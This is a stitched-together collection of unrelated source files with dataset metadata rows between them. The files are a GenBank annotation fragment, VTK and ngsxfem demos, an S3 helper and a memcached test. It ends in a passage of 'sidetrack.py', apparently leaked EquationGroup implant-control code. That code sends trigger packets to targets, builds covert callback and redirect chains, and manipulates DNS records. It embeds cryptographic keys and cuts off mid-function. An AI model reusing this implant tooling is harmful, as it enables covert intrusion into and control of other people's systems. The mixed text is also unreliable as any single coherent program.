\ ) and \ (score >= enter.score or enter.score is False): for i in reversed(range(len(record.features))): if record.features[i].location.start < \ my_feature.location.start and \ (enter.eval is False or e_value <= enter.eval or enter.score is not False): for c in range(len(allowed_features_list)-1): if allowed_features_list[c].location.start <= \ my_feature.location.start <= \ allowed_features_list[c+1].location.start: record.features.insert(i+1, my_feature) break break if i == 0 and \ record.features[i].location.start > \ my_feature.location.start: record.features.insert(i, my_feature) break if i == len(record.features)-1 and \ record.features[i].location.start < \ my_feature.location.start: record.features.insert(i+1, my_feature) break repeats = [] for 
feature in record.features: if 'rpt_family' in feature.qualifiers.keys(): if (feature.qualifiers['rpt_family'] == qualifier['rpt_family'] and \ enter.duplicate is True) or enter.duplicate is False: repeats.append([feature, record.features.index(feature)]) if enter.insert: hit_list = [] for i in range(len(record.features)): if 'CHECK' in record.features[i].qualifiers.keys(): hit_list.append(record.features[i]) for i in reversed(range(len(hit_list))): i = len(hit_list)-1-i for n in range(len(allowed_features_list)-1): if ( is_within_feature(allowed_features_list, n, hit_list[i]) and \ not is_within_boundary(allowed_features_list, n, hit_list[i]) ) or \ wrong_promoter_strand(allowed_features_list[n], hit_list[i], allowed_features_list[n+1]): hit_list.pop(i) break for i in reversed(range(len(record.features))): if 'CHECK' in record.features[i].qualifiers.keys() and \ not any(record.features[i] == hit for hit in hit_list): record.features.pop(i) if enter.palindromic: del_counter = 0 deleted = [] for feature in repeats: if feature not in deleted: for n in range(repeats.index(feature)+1, len(repeats)): further = repeats[n][0] if further.location.strand != feature[0].location.strand and \ 0 <= (further.location.start-feature[0].location.start) <= 2 and \ 0 <= (further.location.end-feature[0].location.end) <= 2 and \ 'CHECK' in record.features[feature[1]-del_counter].qualifiers.keys(): del record.features[feature[1]-del_counter] del_counter += 1 deleted.append(feature) elif enter.duplicate is True: if further.location.strand != feature[0].location.strand and \ 0 <= (further.location.start-feature[0].location.start) <= 2 and \ 0 <= (further.location.end-feature[0].location.end) <= 2 and \ 'CHECK' not in record.features[feature[1]-del_counter].qualifiers.keys() and \ 'CHECK' in record.features[repeats[n][1]-del_counter].qualifiers.keys(): del record.features[repeats[n][1]-del_counter] del_counter += 1 deleted.append(further) if enter.duplicate is True and \ 'rpt_family' in qualifier.keys(): repeats = [] del_counter = 0 for feature in record.features: if 'rpt_family' in feature.qualifiers.keys(): if feature.qualifiers['rpt_family'] == qualifier['rpt_family']: repeats.append([feature, record.features.index(feature)]) for repeat in repeats: for n in range(repeats.index(repeat)+1, len(repeats)): further_repeat = repeats[n][0] if 0 <= (further_repeat.location.start - repeat[0].location.start) <= 2 and \ 0 <= (further_repeat.location.end - repeat[0].location.end) <= 2 and \ repeat[0].qualifiers['rpt_family'] == further_repeat.qualifiers['rpt_family']: if score_parser(repeat[0]) >= \ score_parser(further_repeat): del record.features[repeat[1]-del_counter] elif score_parser(repeat[0]) < \ score_parser(further_repeat): del record.features[repeats[n][0]-del_counter] del_counter += 1 break output_features = [] for feature in record.features: if 'CHECK' in feature.qualifiers.keys(): del feature.qualifiers['CHECK'] output_features.append(feature) score_list = sorting_output_features(output_features) score_list.sort() output(score_list, output_features) print ('\nFeatures added:', len(output_features)) print ('\n' + "-"*50) SeqIO.write(record, output_handle, 'genbank') total += int(len(output_features)) output_handle.close() newlines = dna_topology(enter.output_file, circular_vs_linear) new_output_file = open(enter.output_file, 'w') new_output_file.writelines(newlines) new_output_file.close() input_handle.close() t_end = process_time() print ('Total features: ', total) print ('CPU time: {0:.3f} 
sec'.format(t_end-t_start)) print ('\n' + "="*50)
gpl-3.0
-6,934,267,850,099,133,000
41.085409
109
0.50723
false
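nhmm_parser above recovers hits from nhmmer's --tblout report by hand-splitting on whitespace. As a point of comparison, a minimal sketch of the same parse written against the documented tblout column order from the HMMER manual (the field names below are the manual's, not this script's internal indices):

def parse_tblout(path):
    # Yield one dict per nhmmer hit line, skipping '#' comment lines.
    fields = ("target", "t_acc", "query", "q_acc", "hmm_from", "hmm_to",
              "ali_from", "ali_to", "env_from", "env_to", "sq_len",
              "strand", "evalue", "score", "bias")
    with open(path) as handle:
        for line in handle:
            if line.startswith("#") or not line.strip():
                continue
            parts = line.split(None, len(fields))  # keep the free-text description intact
            hit = dict(zip(fields, parts))
            hit["description"] = parts[len(fields)] if len(parts) > len(fields) else ""
            yield hit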
lorensen/VTKExamples
src/Python/VisualizationAlgorithms/Cutter.py
1
1710
#!/usr/bin/env python

# A simple script to demonstrate the vtkCutter function

import vtk


def main():
    colors = vtk.vtkNamedColors()

    # Create a cube
    cube = vtk.vtkCubeSource()
    cube.SetXLength(40)
    cube.SetYLength(30)
    cube.SetZLength(20)
    cubeMapper = vtk.vtkPolyDataMapper()
    cubeMapper.SetInputConnection(cube.GetOutputPort())

    # Create the plane to cut with; its normal (1,0,0) makes the cut parallel
    # to the YZ plane (use normal (0,0,1) for XY, (0,1,0) for XZ)
    plane = vtk.vtkPlane()
    plane.SetOrigin(10, 0, 0)
    plane.SetNormal(1, 0, 0)

    # create cutter
    cutter = vtk.vtkCutter()
    cutter.SetCutFunction(plane)
    cutter.SetInputConnection(cube.GetOutputPort())
    cutter.Update()
    cutterMapper = vtk.vtkPolyDataMapper()
    cutterMapper.SetInputConnection(cutter.GetOutputPort())

    # create plane actor
    planeActor = vtk.vtkActor()
    planeActor.GetProperty().SetColor(colors.GetColor3d("Yellow"))
    planeActor.GetProperty().SetLineWidth(2)
    planeActor.SetMapper(cutterMapper)

    # create cube actor
    cubeActor = vtk.vtkActor()
    cubeActor.GetProperty().SetColor(colors.GetColor3d("Aquamarine"))
    cubeActor.GetProperty().SetOpacity(0.3)
    cubeActor.SetMapper(cubeMapper)

    # create the renderer and add the actors of plane and cube
    ren = vtk.vtkRenderer()
    ren.AddActor(planeActor)
    ren.AddActor(cubeActor)

    # Add renderer to render window and render
    renWin = vtk.vtkRenderWindow()
    renWin.AddRenderer(ren)
    renWin.SetSize(600, 600)

    iren = vtk.vtkRenderWindowInteractor()
    iren.SetRenderWindow(renWin)
    ren.SetBackground(colors.GetColor3d("Silver"))
    renWin.Render()
    iren.Start()


if __name__ == '__main__':
    main()
apache-2.0
636,900,238,253,238,100
26.580645
103
0.693567
false
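vtkCutter is not limited to a single slice: because the cut is driven by contour values of the implicit function, several parallel cuts can be generated in one pass with GenerateValues. A minimal variation on the example above (only the source/plane/cutter setup is shown; the mapper, actor and render-window plumbing is the same as in Cutter.py):

import vtk

cube = vtk.vtkCubeSource()
cube.SetXLength(40)
cube.SetYLength(30)
cube.SetZLength(20)

plane = vtk.vtkPlane()
plane.SetOrigin(0, 0, 0)
plane.SetNormal(1, 0, 0)

cutter = vtk.vtkCutter()
cutter.SetCutFunction(plane)
cutter.SetInputConnection(cube.GetOutputPort())
cutter.GenerateValues(10, -15, 15)  # 10 cut planes at offsets -15..15 along the normal
cutter.Update()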
ngsxfem/ngsxfem
demos/fictdom_mlset.py
1
4537
""" In this example we solve an unfitted Poisson problem similar to the one in `fictdom.py`, however this time with the unfitted geometry being the unit square. This example shall illustrate the functionality of ngsxfem to solve PDE problems on geometries described via multiple level set functions. PDE problem + Discretisation + Geometry + Implementation aspects: ----------------------------------------------------------------- * As in fictdom.py except for the different geometry and its handling. Used Features: -------------- * Quadrature with respect to multiple level set functions., see the 'mlset_pde' jupyter tutorial. * MultiLevelsetCutInfo, see the 'mlset_basic' jupyter tutorial. * DomainTypeArray convenience layer, see the 'mlset_basic' jupyter tutorial. * Restricted BilinearForm, jupyter tutorial `basics`. * Cut Differential Symbols, jupyter tutorials `intlset` and `cutfem`. """ # ------------------------------ LOAD LIBRARIES ------------------------------- from netgen.geom2d import SplineGeometry from ngsolve import * from xfem import * from xfem.mlset import * ngsglobals.msg_level = 2 # -------------------------------- PARAMETERS --------------------------------- # Domain corners ll, ur = (-0.2, -0.2), (1.2, 1.2) # Initial mesh diameter initial_maxh = 0.4 # Number of mesh bisections nref = 3 # Order of finite element space k = 1 # Stabilization parameter for ghost-penalty gamma_s = 0.5 # Stabilization parameter for Nitsche gamma_n = 10 # ----------------------------------- MAIN ------------------------------------ # Set up the level sets, exact solution and right-hand side def level_sets(): return [-y, x - 1, y - 1, -x] nr_ls = len(level_sets()) u_ex = 16 * x * (1 - x) * y * (1 - y) grad_u_ex = (u_ex.Diff(x).Compile(), u_ex.Diff(y).Compile()) rhs = -(u_ex.Diff(x).Diff(x) + u_ex.Diff(y).Diff(y)).Compile() # Geometry and mesh geo = SplineGeometry() geo.AddRectangle(ll, ur, bcs=("bottom", "right", "top", "left")) ngmesh = geo.GenerateMesh(maxh=initial_maxh) for i in range(nref): ngmesh.Refine() mesh = Mesh(ngmesh) # Level set and cut-information P1 = H1(mesh, order=1) lsetsp1 = tuple(GridFunction(P1) for i in range(nr_ls)) for i, lsetp1 in enumerate(lsetsp1): InterpolateToP1(level_sets()[i], lsetp1) Draw(lsetp1, mesh, "lsetp1_{}".format(i)) square = DomainTypeArray((NEG, NEG, NEG, NEG)) with TaskManager(): square.Compress(lsetsp1) boundary = square.Boundary() boundary.Compress(lsetsp1) mlci = MultiLevelsetCutInfo(mesh, lsetsp1) # Element and degrees-of-freedom markers els_if_singe = {dtt: BitArray(mesh.ne) for dtt in boundary} facets_gp = BitArray(mesh.nedge) hasneg = mlci.GetElementsWithContribution(square) # Finite element space Vhbase = H1(mesh, order=k, dgjumps=True) Vh = Restrict(Vhbase, hasneg) gfu = GridFunction(Vh) hasif = mlci.GetElementsWithContribution(boundary) Draw(BitArrayCF(hasif), mesh, "hasif") for i, (dtt, els_bnd) in enumerate(els_if_singe.items()): els_bnd[:] = mlci.GetElementsWithContribution(dtt) Draw(BitArrayCF(els_bnd), mesh, "els_if_singe" + str(i)) facets_gp = GetFacetsWithNeighborTypes(mesh, a=hasneg, b=hasif, use_and=True) els_gp = GetElementsWithNeighborFacets(mesh, facets_gp) Draw(BitArrayCF(els_gp), mesh, "gp_elements") # Bilinear and linear forms of the weak formulation u, v = Vh.TnT() h = specialcf.mesh_size normals = square.GetOuterNormals(lsetsp1) # Set up the integrator symbols dx = dCut(lsetsp1, square, definedonelements=hasneg) ds = {dtt: dCut(lsetsp1, dtt, definedonelements=els_if_singe[dtt]) for dtt in boundary} dw = 
dFacetPatch(definedonelements=facets_gp) # Construct integrator a = RestrictedBilinearForm(Vh, facet_restriction=facets_gp, check_unused=False) a += InnerProduct(grad(u), grad(v)) * dx for bnd, n in normals.items(): a += -InnerProduct(grad(u) * n, v) * ds[bnd] a += -InnerProduct(grad(v) * n, u) * ds[bnd] a += (gamma_n * k * k / h) * InnerProduct(u, v) * ds[bnd] a += gamma_s / (h**2) * (u - u.Other()) * (v - v.Other()) * dw f = LinearForm(Vh) f += rhs * v * dx # Assemble and solve the linear system f.Assemble() a.Assemble() gfu.vec.data = a.mat.Inverse(Vh.FreeDofs()) * f.vec Draw(gfu, mesh, "uh") # Post-processing err_l2 = sqrt(Integrate((gfu - u_ex)**2 * dx.order(2 * k), mesh)) err_h1 = sqrt(Integrate((Grad(gfu) - grad_u_ex)**2 * dx.order(2 * (k - 1)), mesh)) print("L2 error = {:1.5e}".format(err_l2), "H1 error = {:1.5e}".format(err_h1))
lgpl-3.0
2,544,864,473,202,585,000
29.655405
79
0.648446
false
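In standard notation, the forms assembled in the script above are the symmetric Nitsche formulation with ghost-penalty stabilisation. Transcribing the code (with \Omega the unit square, \Gamma_i its four level-set boundary parts, and \omega_F the facet patches marked in facets_gp):

\[
a_h(u,v) = \int_{\Omega} \nabla u \cdot \nabla v \, dx
 - \sum_i \int_{\Gamma_i} \big( (\nabla u \cdot n)\,v + (\nabla v \cdot n)\,u \big) \, ds
 + \sum_i \frac{\gamma_N k^2}{h} \int_{\Gamma_i} u\,v \, ds
 + \frac{\gamma_s}{h^2} \sum_{F} \int_{\omega_F} (u - u')(v - v') \, dx,
\qquad
f_h(v) = \int_{\Omega} f\,v \, dx,
\]

where u' denotes the value of u on the neighbouring element of a facet patch, matching u.Other() in the code.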
selassid/canopener
canopener/s3file.py
1
1324
# -*- coding: utf-8 -*-
from __future__ import absolute_import
from __future__ import unicode_literals

try:
    from urllib.parse import urlparse
except ImportError:
    from urlparse import urlparse

import tempfile

from boto.s3.connection import S3Connection


def make_s3_connection(aws_access_key_id=None, aws_secret_access_key=None):
    """Mockable point for creating S3Connections."""
    return S3Connection(
        aws_access_key_id=aws_access_key_id,
        aws_secret_access_key=aws_secret_access_key,
    )


class s3file(object):
    def __new__(
            cls,
            filename,
            mode='r',
            aws_access_key_id=None,
            aws_secret_access_key=None,
    ):
        """Opens a local copy of an S3 URL."""
        parse = urlparse(filename)
        if 'w' in mode:
            raise ValueError("can't write to S3")
        if parse.scheme != 's3':
            raise ValueError("s3file can't open non-S3 URLs")

        conn = make_s3_connection(
            aws_access_key_id=aws_access_key_id,
            aws_secret_access_key=aws_secret_access_key,
        )
        bucket = conn.get_bucket(parse.netloc)
        key = bucket.get_key(parse.path)
        local_file = tempfile.TemporaryFile()
        key.get_contents_to_file(local_file)
        local_file.seek(0)
        return local_file
bsd-2-clause
-4,765,795,732,312,073,000
26.583333
75
0.616314
false
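A usage sketch for the class above; the bucket and key are placeholders, and when no credentials are passed boto falls back to its usual environment/config resolution (the import path follows the repository layout shown in the record):

from canopener.s3file import s3file

# Downloads s3://example-bucket/data/input.csv into a local temporary file
# and returns that file object; all subsequent reads are purely local.
f = s3file('s3://example-bucket/data/input.csv')
for line in f:
    print(line)
f.close()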
hankshz/dockers
memcached/script/test-memcached.py
1
1304
#!/usr/bin/env python3

import time
from pymemcache.client.base import Client

master = Client(('memcached-master', 11211))
slave1 = Client(('memcached-slave1', 11211))
slave2 = Client(('memcached-slave2', 11211))
slave3 = Client(('memcached-slave3', 11211))

# Invalidate all.
# mcrouter does not seem to work properly with pymemcache's flush_all,
# so the slaves are flushed directly.
slave1.flush_all()
slave2.flush_all()
slave3.flush_all()

# Set & Get from the master
master.set('a', '1')
assert(master.get('a') == b'1')
master.set('b', '2')
assert(master.get('b') == b'2')
master.set('c', '3')
assert(master.get('c') == b'3')
master.set('d', '4')
assert(master.get('d') == b'4')

# Get from slave1; only keys starting with 'a' are present
slave1 = Client(('memcached-slave1', 11211))
assert(slave1.get('a') == b'1')
assert(slave1.get('b') == None)
assert(slave1.get('c') == None)
assert(slave1.get('d') == None)

# Get from slave2; only keys starting with 'b' are present
slave2 = Client(('memcached-slave2', 11211))
assert(slave2.get('a') == None)
assert(slave2.get('b') == b'2')
assert(slave2.get('c') == None)
assert(slave2.get('d') == None)

# Get from slave3; only the rest of the keys are present
slave3 = Client(('memcached-slave3', 11211))
assert(slave3.get('a') == None)
assert(slave3.get('b') == None)
assert(slave3.get('c') == b'3')
assert(slave3.get('d') == b'4')
apache-2.0
-5,473,104,553,618,401,000
27.347826
60
0.663344
false
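The assertions above imply a prefix-routing policy in front of the three slaves: keys starting with 'a' replicate to slave1, keys starting with 'b' to slave2, and everything else to slave3. A minimal sketch of that policy as a plain function (the function name is this sketch's, not part of the test or of mcrouter):

def route_slave(key):
    # Return the memcached slave that should hold `key` under the routing the test asserts.
    if key.startswith('a'):
        return 'memcached-slave1'
    if key.startswith('b'):
        return 'memcached-slave2'
    return 'memcached-slave3'

assert route_slave('a') == 'memcached-slave1'
assert route_slave('b') == 'memcached-slave2'
assert route_slave('c') == 'memcached-slave3'
assert route_slave('d') == 'memcached-slave3'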
DarthMaulware/EquationGroupLeaks
Leak #4 - Don't Forget Your Base/EQGRP-Auction-File/Linux/bin/pyside/sidetrack.py
1
72163
import base import crypto import echocmd import string import struct import time import re import os import sys from socket import * import rawtcp import types class SIDECMD(echocmd.ECHOCMD): def __init__(self): echocmd.ECHOCMD.__init__(self) def TypeConvert(self, stype): #print "In TypeConvert %d" % (stype) if type(stype) != type(''): if stype == 1: stype = "A" elif stype == 2: stype = "NS" elif stype == 3: stype = "MD" elif stype == 4: stype = "MF" elif stype == 5: stype = "CNAME" elif stype == 6: stype = "SOA" elif stype == 7: stype = "MB" elif stype == 8: stype = "MG" elif stype == 9: stype = "MR" elif stype == 10: stype = "NULL" elif stype == 11: stype = "WKS" elif stype == 12: stype = "PTR" elif stype == 13: stype = "HINFO" elif stype == 14: stype = "MINFO" elif stype == 15: stype = "MX" elif stype == 16: stype = "TXT" elif stype == 252: stype = "AXFR" elif stype == 253: stype = "MAILB" elif stype == 254: stype = "MAILA" elif stype == 255: stype = "*" return stype def ConvertType(self, rtype): if type(rtype) != type(0): rtype = string.upper(rtype) if rtype == "A": rtype = 1 elif rtype == "NS": rtype = 2 elif rtype == "MD": rtype = 3 elif rtype == "MF": rtype = 4 elif rtype == "CNAME": rtype = 5 elif rtype == "SOA": rtype = 6 elif rtype == "MB": rtype = 7 elif rtype == "MG": rtype = 8 elif rtype == "MR": rtype = 9 elif rtype == "NULL": rtype = 10 elif rtype == "WKS": rtype = 11 elif rtype == "PTR": rtype = 12 elif rtype == "HINFO": rtype = 13 elif rtype == "MINFO": rtype = 14 elif rtype == "MX": rtype = 15 elif rtype == "TXT": rtype = 16 elif rtype == "AXFR": rtype = 252 elif rtype == "MAILB": rtype = 253 elif rtype == "MAILA": rtype = 254 elif rtype == "*": rtype = 255 return rtype def ClassConvert(self, rclass): #print "In ClassConvert %d" % (rclass) if type(rclass) != type(''): if rclass == 1: rclass = "IN" elif rclass == 2: rclass = "CS" elif rclass == 3: rclass = "CH" elif rclass == 4: rclass = "HS" return rclass def ConvertClass(self, rclass): if type(rclass) != type(0): rclass = string.upper(rclass) if rclass == "IN": rclass = 1 elif rclass == "CS": rclass = 2 elif rclass == "CH": rclass = 3 elif rclass == "HS": rclass = 4 return rclass def ConvertFlags(self, flags): # qr rd ra retFlags = 0 if type(flags) != type(0): flags = string.upper(flags) if flags == "RA": retFlags = retFlags | 0x0080L if flags == "AA": retFlags = retFlags | 0x0400L return retFlags def SectionConvert(self,section): if type(section) != type(''): if section == 0: section = "query" elif section == 1: section = "ans" elif section == 2: section = "auth" elif section == 3: section = "add" return section def ConvertSection(self,section): if type(section) != type(0): section = string.upper(section) if section[:1] == "Q": section = 0 elif section[:2] == "AN": section = 1 elif section[:2] == "AU": section = 2 elif section[:2] == "AD": section = 3 return section def NameConvertName(self, name): ret = '' sp = 0 if type(name) != type(0): while name[sp:sp+1] != '\000': namelen = struct.unpack("!H",'\000' + name[sp:sp+1])[0] #print namelen if sp != 0: ret = ret + '.' 
for i in range(1,namelen+1): val = struct.unpack("!H", '\000' + name[sp+i:sp+i+1])[0] if val >= 32 and val < 127: ret = ret + name[sp+i:sp+i+1] else: raise TypeError, self.HexConvert(name) sp = sp+1+namelen return ret def NameConvert(self, name, padding=0): try: return self.NameConvertName(name) except: return self.HexConvert(name, padding) def ConvertName(self, name): ret = '' regExpr = re.compile("^[a-zA-Z0-9-_.]*$") if type(name) != type(0x0L): reg = regExpr.search(name) if reg != None: dots = string.splitfields(name,".") for i in range(len(dots)): ret = ret + chr(len(dots[i])) + dots[i] ret = ret + '\000' return ret else: return name else: return struct.pack("!H",name) def FlagConvert(self, flag): if flag == 0: return "Ignore" elif flag == 1: return "Count" elif flag == 2: return "Active" def HexConvert(self,data,pad=0): ret = '' padding = '' for i in range(pad): padding = padding + ' ' for i in range(len(data)): if i % 16 == 0 and i != 0: ret = ret + '\n' + padding myNum = struct.unpack("!H", '\000'+data[i:i+1])[0] ret = ret + "%02x " % myNum ret = ret + '\n' + padding + "(%d)" % (len(data)) return ret class SIDETRACK(base.Implant): def __init__(self, session, proto): base.Implant.__init__(self, session, proto) self.name = 'SIDETRACK' self.newCV = None self.targetopts = self.session.target.GetImplantOpts('sidetrack') self.version = self.targetopts['VERSION'] if self.version >= 2.0: self.cipher = crypto.rc6() else: self.cipher = crypto.rc5() self.cipher.SetKey(self.targetopts['KEY']) self.N = 0xdec9ba81a6b9ea70c876ad3413aa7dd57be75d42e668843b1401fd42015144231004bfab4e459dabdbb159665b48a4d72357c3630d0e911b5b96bf0b0d8ab83f4bb045a13ea2acc85d120c3539f206200b9931a41ad6141eb7212e66784880ff6f32b16e1783d4ca52fe5ec484ef94f019feaf58abbc5de6a62f10eec347ac4dL self.d = 0x25219f159bc9a712cc13c788adf1bfa394a68f8b2666c0b48355aa35aae2e0b082ab754737b644f1f9f2e43bb9e170ce85e3f5e5d7826d848f43ca81d7971eb4e7a62bc8e5e0a549bcb9ecb216451f8ba32444a71cb0ff97a77500cb39f802968ae7c10366d3eed895b939ec54eb8c4c54329bddb0eb00e691bc6b5d10d5af05L self.Nsign = 0xb2003aac88a36d45d840bc748aa972b3f2e69a29f43f1e2faf810d9172db756d4843492489781764688d29c3a547a1522702d20e10f426149ac2f323bf35dfa1cb036f467109fd321bae03711eab16b210ed131ac077113f1dd34be480508708893c1a40fdc1b1d637e1cf3efd13e6bbbdc88a8c2fc103a45c490ba933a79a31L self.dsign = 0x076aad1c85b179e2e902b284db1c64c77f74466c6a2d4beca7500b3b64c924e48dad786185ba564ed9b08c6826e2fc0e16f5736b40b4d6eb8672ca217d4ce95156a1920e3e48fe1dfe82738bb6ec985c441421d188962b141d3113773e8006b1273de6b846635ff7979547b516d7c426d5c3b0e2505150095b81e266e3b97c03L self.packetSize = 450 self.timediff = self.session.target.timediff self.localRedir = None self.parent = None self.children = [] self.rules = [] def RegisterCommands(self): self.AddCommand('ping', echocmd.ECHOCMD_PING) self.AddCommand('status', echocmd.ECHOCMD_STATUS) self.AddCommand('done', echocmd.ECHOCMD_DONE) self.AddCommand('setsize', echocmd.ECHOCMD_SETSIZE) self.AddCommand('timediff', echocmd.ECHOCMD_TIMEDIFF) self.AddCommand('incision', echocmd.ECHOCMD_INCISION) self.AddCommand('rekey', echocmd.ECHOCMD_REKEY) self.AddCommand('switchkey', echocmd.ECHOCMD_SWITCHKEY) self.AddCommand('origkey', echocmd.ECHOCMD_ORIGKEY) self.AddCommand('key', echocmd.ECHOCMD_KEY) self.AddCommand('init', SIDECMD_INIT) self.AddCommand('dnsadd', SIDECMD_DNSADD) self.AddCommand('dnsrm', SIDECMD_DNSREMOVE) self.AddCommand('dnsset', SIDECMD_DNSSET) self.AddCommand('dnsaction', SIDECMD_DNSACTION) self.AddCommand('dnsraw', SIDECMD_DNSRAW) self.AddCommand('dnslist', 
SIDECMD_DNSLIST) self.AddCommand('dnsload', SIDECMD_DNSLOAD) self.AddCommand('dnssave', SIDECMD_DNSSAVE) self.AddCommand('rediradd', SIDECMD_REDIRADD) self.AddCommand('redirlist', SIDECMD_REDIRLIST) self.AddCommand('redirset', SIDECMD_REDIRSET) self.AddCommand('redirrm', SIDECMD_REDIRREMOVE) self.AddCommand('connlist', SIDECMD_CONNLIST) self.AddCommand('connrm', SIDECMD_CONNREMOVE) self.AddCommand('stunload', SIDECMD_UNLOAD) self.AddCommand('connect', SIDECMD_CONNECT) self.AddCommand('cclist', SIDECMD_CCLIST) self.AddCommand('ccremove', SIDECMD_CCREMOVE) self.AddCommand('multiaddr', SIDECMD_MULTIADDR) ########################################################################## # HASANOTHERADDRESS class ######################################################################### class SIDECMD_MULTIADDR(SIDECMD): def __init__(self): SIDECMD.__init__(self) self.name = "multiaddr" self.usage = "multiaddr <0|1>" self.info = "Let pyside know that the target has multiple addresses" def run(self, value=1): self.implant.session.target.hasAnotherAddress = value return (1, "Value updated") ########################################################################## # CONNECT class ######################################################################### class SIDECMD_CONNECT(SIDECMD): def __init__(self): SIDECMD.__init__(self) self.name = "connect" self.usage = "connect <listen_address>:<listen_port>/<callback_port> <trigger_port>" self.info = "Connect to SIDETRACK" def parseHostInfo(self,host): #split the ip from the ports res = string.split(host,":") if len(res) == 1: raise ValueError, host elif len(res) == 2: ports = string.split(res[1],"/") if len(ports) != 2: raise ValueError, host if ports[0] == "*": raise ValueError, ports[0] else: ports[0] = eval(ports[0]) if ports[1] == "*": raise ValueError, ports[1] else: ports[1] = eval(ports[1]) try: host = None ipaddr = self.ConvertIP(res[0]) except: # host references a session host = base.sessionDict[res[0]] ipaddr = self.ConvertIP(host.target.GetIP()) return host,ipaddr,ports[0],ports[1] else: raise ValueError, host def run(self,hostinfo,fport): # Parse the ports prevRule = None tempRule = None localRedir = None host,laddr,lport,cbport = self.parseHostInfo(hostinfo) if fport == 0: PORT = 500 #open the listener try: sock = socket(AF_INET,SOCK_STREAM,0) sock.bind(('',lport)) sock.listen(2) except error, message: return (0, "Could not open port %d %s" % (lport,message)) # See if the user entered another host if host != None: self.implant.parent = host #hpn is the hop prior to host (might just be "me") hpn = host.implant.parent.name myname = host.name hostinfo = re.sub(myname,hpn,hostinfo) # Testing localRedir = REDIRECT(self,0,10800,10800,6,\ self.ConvertIP(self.implant.session.target.ip), \ self.ConvertIP(self.implant.session.target.ip), 0,0,0,(0,0,0,0),0,0x201,lport,cbport,0,0) localRedir.add(0) self.implant.session.localRedir = localRedir # Add a redirect (on the previous host) for this connection cmd = host.GetCommand('rediradd') base.ccSupport = 1 res = cmd.run("tcp",hostinfo,"%s:%d/%d"%(self.implant.session.target.ip,cbport,lport),"-tfix", "-afix","-l","3h","-c","3h") base.ccSupport = 0 if res[0] == 0: return res # Let the previous implant know this redirect rule is in support # of a command and control connection prevRule = cmd.redir if prevRule != None: prevRule.ccPassthru = self.implant.session # Add a temporary rule to allow the trigger to be passed to target base.ccSupport = 1 if fport == 0: res = 
cmd.run("udp","%s:%d/%d"%(hpn,PORT,PORT),"%s:%d/%d"%(self.implant.session.target.ip,PORT,PORT),"-tfix", "-afix") else: res = cmd.run("tcp","%s:%d/%d"%(hpn,0,fport),"%s:%d/%d"%(self.implant.session.target.ip,fport,0),"-tfix") base.ccSupport = 0 base.db(2,"%d.%d.%d.%d"%(res[2] >> 24, (res[2] >> 16) & 0xff, (res[2] >> 8) & 0xff, res[2] & 0xff)) if res[0] == 0: if prevRule != None: prevRule.remove() return (0, "Unable to establish redir for port %d: %s"%(fport,res[1])) tempRule = cmd.redir else: localRedir = None prevRule = None self.implant.session.localRedir = None #add the rule if tempRule == None or (tempRule != None and \ cmd.implant.session.target.hasAnotherAddress == 0): rule = base.redir.listen(laddr,\ self.ConvertIP(self.implant.session.target.ip),\ fport,lport,cbport,\ self.implant.timediff, \ self.implant.cipher.GetKey()) else: rule = base.redir.listen(tempRule.ST_ip,\ self.ConvertIP(self.implant.session.target.ip),\ fport,lport,cbport,\ self.implant.timediff, \ self.implant.cipher.GetKey()) #Make the connection if fport == 0: conn = socket(AF_INET,SOCK_DGRAM,0) conn.bind(('',PORT)) conn.connect((self.implant.session.target.ip,PORT)) f = os.popen("dd if=/dev/urandom bs=128 count=3 2>/dev/null") d = f.read() f = None data = d[0:14] + struct.pack("HBBBB", 0, 0x08, 0x10, 0x20, 0x01) + \ d[16:20] + struct.pack("!L", 0x154) + d[20:332] conn.send(data) conn.close() #accept self.implant.protocol.sock,addr = sock.accept() else: #conn = socket(AF_INET,SOCK_STREAM,0) # STUB: Catch this in a try statement try: # esev - 6/24/03 #conn.connect((self.implant.session.target.ip,fport)) #conn.close() #conn = None rawtcp.sendFakeConnection(self.implant.session.target.ip,fport) # STUB: Put a timeout here #accept self.implant.protocol.sock,addr = sock.accept() except: base.redir.delete(rule) sock.close() sock = None #if conn != None: # conn.close() if localRedir != None: localRedir.remove() if prevRule != None: prevRule.remove() if tempRule != None: tempRule.remove() base.sessionDict[self.implant.session.name] = None return (1,"Canceled by user, target %s removed" % self.implant.session.name) sock.close() sock = None # Set the CC redirect to inactive. 
This will not effect the # current connection..only prevent the rule from getting in the way if prevRule != None: prevRule.set(0) #if there is a connection back return 1 else 0 if self.implant.protocol.sock: cmd = self.implant.session.GetCommand("init") res = cmd.run() # remove the temporary redirect if tempRule != None: tempRule.remove() # remove the connection rule base.redir.delete(rule) if res[0] == 0: return res else: sys.stderr.write("%s\n"%(res[1])) return (1, "Connected") else: # remove the temporary redirect if tempRule != None: tempRule.remove() # remove the connection rule base.redir.delete(rule) return (0, "Could not connect") ########################################################################## # INIT class # op code: 0x20 ######################################################################### class SIDECMD_INIT(SIDECMD): def __init__(self): SIDECMD.__init__(self) self.name = "init" self.usage = "init" self.info = "Initialize the implant" def run(self): msg = echocmd.ECHOCMD.run(self) if msg != None: return (0,msg) cmd = self.implant.session.GetCommand("ping") res = cmd.run() if res[0] == 0: return res else: sys.stderr.write("%s\n"%(res[1])) for i in range(3): cmd = self.implant.session.GetCommand("rekey") res = cmd.run() if res[0] != 0: break if res[0] == 0: return res else: sys.stderr.write("%s\n"%(res[1])) cmd = self.implant.session.GetCommand("switchkey") res = cmd.run() if res[0] == 0: return res else: sys.stderr.write("%s\n"%(res[1])) cmd = self.implant.session.GetCommand("status") res = cmd.run() if res[0] == 0: return res else: sys.stderr.write("%s\n"%(res[1])) return (1,"Initialization complete") ########################################################################## # DNSREAD class ######################################################################### class SIDECMD_DNSLOAD(SIDECMD): def __init__(self): SIDECMD.__init__(self) self.name = "dnsload" self.usage = "dnsload <filename>" self.info = "Send DNS data from a file to the target" #------------------------------------------------------------------------- # Name : ProcessArg # Purpose: Tests to see if the argument is a string or number # Receive: arg - The argument to test # Return : The original string if a number, or a quoted string if not #------------------------------------------------------------------------- def ProcessArg(self,arg): if (re.match('^-?[0-9]*(\.[0-9]+)?$',arg) != None or \ re.match('^0x[0-9a-fA-F]+L?', arg) != None): return arg else: return '"' + arg + '"' def runRule(self, args): cmd = SIDECMD_DNSADD() cmd.implant = self.implant argString = 'myRes = cmd.run(' for i in range(1,len(args)): if i == 1: argString = argString + self.ProcessArg(args[i]) else: argString = argString + ", " + self.ProcessArg(args[i]) argString = argString + ')' print argString exec(argString) if myRes and myRes[0]: self.lastRule = myRes[0] def runSet(self, args): cmd = SIDECMD_DNSSET() cmd.implant = self.implant argString = 'myRes = cmd.run(self.lastRule' for i in range(1,len(args)): 